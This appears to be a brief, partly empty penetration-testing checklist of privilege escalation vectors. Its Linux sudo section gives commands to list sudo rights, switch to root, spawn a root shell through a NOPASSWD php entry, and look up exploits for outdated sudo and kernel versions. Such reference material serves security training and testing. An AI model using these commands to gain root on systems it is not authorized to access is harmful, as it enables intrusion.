Possible privilege escalation vectors - Manual checklist
Check list for common vectors to escalate on Linux & Windows. Use index ->
Linux check list
Check for sudo current user privileges
sudo -l #Shows what sudo privileges the user has
sudo su - #If (ALL:ALL) ALL or privileges on "su", switchs to root user
#user ALL=(ALL) NOPASSWD: /usr/bin/php
sudo php -r “system(‘/bin/sh’);” #/bin/sh to return root shell but you can execute whatever ?"-r" runs php code directly from the CLI, "system" is a function used to execute external commands Check if sudo version is outdated and vulnerable
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
searchsploit sudo OS & Kernel outdated
cat /etc/os-release
uname -a
searchsploit versionFoundPATH
Vulnerable software installed
Over-privileged processes
Writable .service files
Cron jobs
Exposed credentials
SSH Keys
Windows
Check for vulnerable software installed
Last updated